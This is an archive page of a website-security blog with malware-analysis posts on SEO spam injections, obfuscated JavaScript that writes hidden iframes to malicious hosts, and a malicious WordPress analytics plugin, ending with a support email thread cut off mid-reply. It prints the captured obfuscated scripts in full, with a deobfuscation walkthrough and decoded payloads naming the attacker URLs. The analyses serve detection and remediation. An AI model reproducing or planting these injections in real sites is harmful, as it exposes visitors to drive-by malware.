Sunday, March 31, 2013

Blackhat SEO Spam injection example

Black SEO Spam injected into website identified with Online Website Scanner

No active malware was found on this website and it might look completely normal if opened in web browser. However, when we did Google search for it we noticed that some pages have identical text in search results preview. And the content had no relation to the topics this website was intended to cover, which is pictures, videos and notes about nature. 

Here is Google results snapshot:

Blackhat SEO Spam

Website Malware Scanner report

Sun Mar 31 18:10:13 2013
Infected website's files: N/A
Website malware scan report: http://goo.gl/XXTPr

As you can see the engine identified 38 Potentially Suspicious files.



Let's take a look at the beautified Threat Dump:


  1. < script type = 'text/javascript'
  2.         language = 'javascript' >
  3.         var _ga3 = []; _ga3.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);_ga3.push(['_setOption', '6918518510413211617918517317417116717017118411919318218']); _ga3.push(['_setPageId','1185175186175181180128167168185181178187186171129169178']); _ga3.push(['_trackPageview','1751821281841711691861101221251261821901141671871861811']); _ga3.push(['_trackPageview','1416718718618111412212512618219011112919513011718518619']); _ga3.push(['_setOption', '1178171132']);
  4.         var t = z = '', l = pos = v = 0, a1 = "arCo", a2 = "omCh";
  5.         for (= 0; v < _ga3.length; v++) t += _ga3[v][1]; l = t.length;
  6.         while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);document.write(z);
  7.         < /script>


This looks pointless as it decodes to:

<style type="text/css">.msgheader1{position:absolute;clip:rect(478px,auto,auto,478px);}</style>

We can't say for sure how this serves the Blackhat SEO Spamming purposes but it is clear not the original intent of the webmaster.

Now let's take a look at the links. We won't place an image of all 174 links that were detected by the malware scanner we just put those that are clearly injected and that redirect to websites selling Viagra.







Now actually we may assume that the website was attacked and the placed links are raising their page rank on search engines. The above Potentially Suspicious JavaScript might be used to track these links as it looks like malicious GA code.

Removing the spam


Actually, in case of this website it looks like malicious WordPress plugin. But to say for sure it requires a manual check. In case of shared hosting the infected files might not be on the attacked website. Or at least not all of them. If you suspect your site has been compromised in this way sign up for Website Anti-malware Monitoring and receive malware remediation assessment for these and other kinds of malware.


Saturday, March 30, 2013

Thursday, March 28, 2013

Malicious hidden iframe downloads content from suspicious website


Obfuscated JavaScript code generates iframe to load content from suspicious website

Background


Online Website Malware Scanner detected malicious JavaScript code injection.This sort of malicious obfuscated JavaScript code is used to build malicious iframe that is not visible to the website user to finally bring content from remote malware distributor. In case of this website the suspicious JavaScript code is injected in 24 files. As discussed in other posts about malicious iframes generation the flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 


Malicious action


Malicious iframes are usually utilized to distribute malware from external web resources(websites).


Detection details


Submission date: Thu Mar 28 08:14:34 2013
Infected website pages: 24
Website malware scan report: http://goo.gl/rsXvJ
Snapshot from Quttera's online Website Malware Scanner























Threat dump:
[[                                                                                                                                                                                                                                                          asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6a,0x7b,0x7b,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x72,0x6a,0x7b,0x7b,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6a,0x7b,0x7b,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";if(whwej){for(i=0;i-483!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww["eval"](""+s);}}}}]]

Wednesday, March 27, 2013

Suspicious obfuscated JavaScript generates iframe to Blacklisted website

Obfuscated JavaScript generates iframe to Blacklisted website

This sort of suspicious obfuscated JavaScript code is used to build malicious iframe that is not visible to the website visitor but identified by Online Website Malware Scanner. In case of this website the suspicious JavaScript code is injected in 59 files. Multiple redundant "IF" statements and levels of obfuscation is used to by-pass the detection mechanisms and finally call to eval() for evaluation of malicious action. The invocation of eval() is, also, passed through several variables to make it harder to identify. Malicious iframes are usually utilized to distribute malware from external web resources(websites).

Full website malware scan report: http://goo.gl/pIjYY
Submission date: Tue Mar 26 18:47:55 2013
Snapshot from Quttera's online Website Malware Scanner:


Threat dump:
[[ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0153,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0160,0145,0162,0163,0157,0156,0141,0154,055,0146,0151,0164,0156,0145,0163,0163,055,0142,0154,0157,0147,056,0144,0145,057,0143,0154,0151,0143,0153,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0153,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]

Beautified script

ff = String;
fff = "fromCharCode";
ff = ff[fff];
zz = 3;
try {
    document.body % 26 = 5151
} catch (gdsgd) {
    v = "eva" + "l";
    if (document) try {
            document.body = 12;
    } catch (gdsgsdg) {
        vzs = 0;
        try {
            document;
        } catch (q) {
            vzs = 1;
        }
    }
    if (!vzs) e = window[v];
    if (1) {
        f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0153, 0170, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0160, 0145, 0162, 0163, 0157, 0156, 0141, 0154, 055, 0146, 0151, 0164, 0156, 0145, 0163, 0163, 055, 0142, 0154, 0157, 0147, 056, 0144, 0145, 057, 0143, 0154, 0151, 0143, 0153, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0153, 0170, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0153, 0170, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
    }
    w = f;
    s = [];
    if (window.document) for (i = 2 - 2; - i + 473 != 0; i += 1) {
            j = i;
            if ((031 == 0x19)) if (e) s = s + ff(w[j]);
    }
    xz = e;
    if (window.document) if (v) xz(s)
}

Simplified version of detected web threat

     f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 01
     w = f;
     s = [];
     for (i = 2 - 2; - i + 473 != 0; i += 1) {
         s = s + String.fromCharCode(w[i]);
     }
     s = s.replace(/&/g,"&amp;");
     s = s.replace(/</g,"&lt;");
     s = s.replace(/>/g,"&gt;");
     document.write("<pre><code>" +  s + "</code></pre>");

Detected payload

(function () {
    var kx = document.createElement('iframe');

    kx.src = 'http://www.personal-fitness-blog[.]de/clicker[.]php';
    kx.style.position = 'absolute';
    kx.style.border = '0';
    kx.style.height = '1px';
    kx.style.width = '1px';
    kx.style.left = '1px';
    kx.style.top = '1px';

    if (!document.getElementById('kx')) {
        document.write('<div id=\'kx\'></div>');
        document.getElementById('kx').appendChild(kx);
    }
})();

URL targeted by generated iframe 

There were actually several URLs and they changed each time to a new one. Here are some that we detected:

  1. http://www.personal-fitness-blog[.]de/clicker[.]php
  2. http://prolocomilazzo[.]it/dtd[.]php



Blacklisting status

Yandex via Sophos: http://www.yandex.com/infected?url=personal-fitness-blog.de&l10n=en

Snapshot:


Malware clean-up

Such malware is often hidden inside the JavaScript file. If you were infected by similar malware please use one of accounts here for remediation assessment.

Tuesday, March 26, 2013

Malicious WordPress plugin using dynamic "fromCharCode" method

Malicious WordPress plugin

Online Website Malware Scanner detected similar malicious JavaScript script in the WordPress plugin. We already encounter similar patterns in other websites. 

Full website malware scan report: http://quttera.com/detailed_report/www.afwake.com
Submission date: Mon Mar 25 20:30:03 2013
Quttera website scan report snapshot:




The malicious JavaScript with dynamic "fromCharCode"

<script type='text/javascript' language='javascript'>
    var _ga7 = [];
    _ga7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
    _ga7.push(['_setOption', '6918518510413211616916718518716717816517619318218118517']);
    _ga7.push(['_trackPageview', '5186175181180128167168185181178187186171129169178175182']);
    _ga7.push(['_setPageId', '1281841711691861101221211221821901141671871861811141671']);
    _ga7.push(['_setOption', '8718618111412212112218219011112919513011718518619117817']);
    _ga7.push(['_setOption', '1132']);
    var t = z = '',
        l = pos = v = 0,
        a1 = "arCo",
        a2 = "omCh";
    for (v = 0; v < _ga7.length; v++) t += _ga7[v][1];
    l = t.length;
    while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
    document.write(z);
</script>

Related post

Similar case with malicious Google Analytics plugin discussed here http://quttera.blogspot.co.il/2013/03/malicious-wordpress-plugin-detection.html

Monday, March 25, 2013

Obfuscated JavaScript to load hidden iframe with malicious redirection

Obfuscated JavaScript used to load hidden iframe with malicious link

This sort of malicious re-directions using obfuscated execution of eval have been detected by Website walware scanner. In this case the script contained lots of redundant "IF" statements to by-pass the detection mechanisms. The invocation of eval is passed through several variables to mask it from malware detection engines.

Full website malware scan report: http://goo.gl/JhYp5
Submission date: Sun Mar 24 16:27:53 2013
Threat dump:
[[                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0157,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0157,0165,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0163,0165,0172,0165,0153,0151,0147,0163,0162,066,060,060,056,0156,0145,0164,0141,0165,056,0156,0145,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0157,0165,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0157,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+471!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}]]

Snapshot from Quttera's Online Malware Scanner:






















The beautified script 

ff = String;
fff = "fromCharCode";
ff = ff[fff];
 zz = 3;
 try {
     document.body % 26 = 5151
 } catch (gdsgd) {
     v = "eval";
     if (document) try {
             document.body = 12;
     } catch (gdsgsdg) {
         asd = 0;
         try {} catch (q) {
             asd = 1;
         }
         if (!asd) {
             w = {
                 a: window
             }.a;
             vv = v;
         }
     }
     e = w[vv];
     if (1) {
         f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0157, 0165, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0163, 0165, 0172, 0165, 0153, 0151, 0147, 0163, 0162, 066, 060, 060, 056, 0156, 0145, 0164, 0141, 0165, 056, 0156, 0145, 0164, 057, 0143, 0157, 0165, 0156, 0164, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0157, 0165, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0157, 0165, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
     }
     w = f;
     s = [];
     if (window.document) for (i = 2 - 2; - i + 471 != 0; i += 1) {
             j = i;
             if ((031 == 0x19)) if (e) s = s + ff(w[j]);
     }
     xz = e;
     if (v) xz(s)
 }

The obfuscation flow

  1. ff = String;
    fff = "fromCharCode";
    ff = ff[fff];
    /* ff is pointer to String's method fromCharCode hence getting String.fromCharCode */
  2. try { document.body % 26 = 5151
    /* since body is object or string, numeric operation will raise exception and following "catch" block will be executed */
    } catch (gdsgd) { v = "eval";
    /* v = eval which is identical to eval("javascript code") */
  3. if (document) try {
    document.body = 12;
    /* the same as before, the following instruction will raise exception */ } catch (gdsgsdg) {
    asd = 0;
    try {} catch (q) {
    /* try block is empty, catch block is skipped and asd will remain zero */
    asd = 1;
    }
  4. if (!asd) {
    /* since asd is zero this if condition will be executed the following trik is identical to "w = window" w = { a: window }.a; vv = v; vv = "eval" */
    }
    /* w equals to window and vv equals to eval thus this instruction is identical to e = window["eval"] */
    e = w[vv];
    if (1) {
    /* 1 is true so execution flow enters this if block */
  5. if (window.document){
    /* window.document is object so it is always true and execution flow enters this block */
    for (i = 2 - 2; - i + 471 != 0; i += 1) {
    j = i;
    if ((031 == 0x19)){
    /* this is comparison of the same value represented in hexanumeric and octal formats */
    if (e){
    /* e points to function eval so it is true and execution block will enter here */
    s = s + ff(w[j]);
    /* this equals to s = s + String.fromCharCode(w[j]) */
    } } } }
  6. xz = e;
    /* xz now points to eval method */
    if (v){
    /* v points to eval so it is "true" and thus eval(s) will be executed */
    xz(s)

The malicious injection

By the time this post was created the site was already down.
The simplified version of the threat is:

(function () { var ou = document.createElement('iframe'); ou.src = 'http://www.suzukigsr600[.]netau[.]net/counter.php'; ou.style.position = 'absolute'; ou.style.border = '0'; ou.style.height = '1px'; ou.style.width = '1px'; ou.style.left = '1px'; ou.style.top = '1px'; if (!document.getElementById('ou')) { document.write('
'); document.getElementById('ou').appendChild(ou); } })();


The iframe loaded the file from external malicious resource. Such threats are trickier for detection and remediation. These and other javascript obfuscation techniques detection is "built-in" Website Anti-malware Monitoring and user is notified instantly once it is identified.

Sunday, March 24, 2013

Common type of malicious iframe injection

Hidden iframe with malicious redirection

This sort of malicious re-directions using hidden iframes is a common threat that is detected by Quttera's  Website walware scanner. It is actually very easy to detect for website owners who's website has been compromised. 
Submission Date: Sun Mar 24 15:11:13 2013
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]

Snapshot from Quttera's Online Malware Scanner:















Wednesday, March 20, 2013

Malicious WordPress plugin. Detection and resolution process.

Our team was contacted regarding the detection of the www.dnexpert.com website as Suspicious by our Online Malware Scanner.
Online malware scanner is available for everyone and the results are then posted in the database depending on the domain status.

The issue was that this domain was listed in Suspicious database: http://quttera.com/lists/suspicious. After the issue has been resolved we asked for website owner's agreement to place the whole discussion on our Forum and Blog so that it might help other webmasters to detect similar issues.

Mirza, kindly agreed so here is the thread:

We removed his last name for the privacy reasons.

On Sat, Mar 16, 2013 at 6:05 PM, Mirza wrote:
Hi guys, My website was infected by a malicious code when I installed a WordPress google analytics plugin from http://wordpress.org/extend/plugins/face-for-all-children-everywhere/ The plugin has since been detected by WordPress and removed as explained here: http://wordpress.org/support/topic/somethings-mixed-up-here I have checked my site and it no longer contains the malicious code, however, your plugin is not allowing me to rescan my site, it keeps giving me the cached results with the 4 malicious code detection. Can you please rescan my site? I don't want my url appearing in the suspicious urls database. My website is :www.dnexpert.com Thank you, Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 5:37 PM
Subject: Re: remove from suspicious database
Hi Mirza, Thank you very much for using our WordPress plugin, please take a look on our monitoring service http://quttera.com/website-anti-malware-monitoring. This service will scan your site automatically every 24 hours and notify you if we found something suspicious thus providing you capabilities to detect malware on your site before it is blacklisted by Google and other blacklisting providers. We scanned your site one again and still see some potentially suspicious files. You can access this new report either from wordpress plugin or via this link: http://quttera.com/detailed_report/www.dnexpert.com The issue is with this script tag found on several pages:

[[<script type='text/javascript' language='javascript' > 
var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);
_ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']);
_ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']);
_ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']);
_ga4.push(['_trackPageview', '1129195130117185186191178171132']);
var t=z="",l=pos=v=0,a1="arCo",a2="omCh";
for (v=0;
 v<_ga4.length;
 v++) t += _ga4[v][1];
l=t.length;
 while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
 document.write(z);
 </script>]]

The issue here is dynamic generation of "fromCharCode" method name which treated as JavaScript code obfuscation method. Do you aware of this script block? Thanks a lot, Michael

On Sat, Mar 16, 2013 at 6:48 PM, Mirza wrote:
